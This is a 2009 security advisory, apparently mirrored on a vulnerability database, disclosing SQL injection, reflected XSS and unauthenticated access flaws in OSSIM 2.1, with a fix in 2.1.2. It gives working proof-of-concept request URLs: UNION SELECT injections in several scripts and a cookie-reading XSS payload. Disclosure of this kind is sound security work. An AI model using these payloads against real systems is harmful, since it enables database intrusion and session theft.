Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:22499
HistorySep 23, 2009 - 12:00 a.m.

[DSECRG-09-055] OSSIM 2.1 - Multiple security vulnerabilities

2009-09-2300:00:00
vulners.com
40
JSON

OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.

  1. SQL Injections
  2. Linked XSS
  3. Unauthorized access

Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055

Application: OSSIM
Versions Affected: 2.1 and may be 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection,XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory:21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]

Details

1.1 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_document.php
Vulnerable parameter - id_document

Example

http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6–&maximized=1&search_bylink=&pag=1

1.2 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_links.php
Vulnerable parameter - id_document

Example

http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3
union select 1,user(),3,4,5,6

1.3 SQL injections in repository

Attacker need to be authorized in system for success.

Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document

Example

http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3
union select 1,user(),3,4,5,6

1.4 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - getpolicy.php
Vulnerable parameter - group

Example

http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1

1.5 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - newhostgroupform.php
Vulnerable parameter - name

Example

http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select
user(),'b','c','d','f

1.6 SQL injection in policy scripts

Attacker need to be authorized in system for success.

Vulnerable script - modifynetform.php
Vulnerable parameter - name

Example

http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select
user(),'b','c','d','e','f','g','h','a

And others scripts in policy menu.

  1. Linked XSS in main menu

Vulnerable script /ossim/
Vulnerable parameter - option

Example

http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="

  1. Access to data without authentication.

Unauthorized user can see graphs and infrastructure

Example

Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php

Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php

Fix Information

Upgrade to version 2.1.2

About

Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and
penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS
standards. Digital Security Research Group focuses on web application and database security problems with vulnerability
reports, advisories and whitepapers posted regularly on our website.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

JSON